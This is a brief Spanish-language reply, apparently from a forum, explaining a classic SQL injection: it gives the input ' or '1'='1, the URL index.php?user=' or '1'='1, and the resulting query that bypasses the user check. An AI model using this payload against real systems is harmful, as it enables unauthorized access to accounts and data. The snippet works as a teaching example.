mira, prueba con el siguiente user:
' or '1'='1
entonces vas a:
index.php?user=' or '1'='1
y el select te va a quedar asi:
SELECT * FROM usuarios WHERE user = '' or '1'='1'
entonces, este select va a seleccionar creo que el primer usuario en la tabla

saludos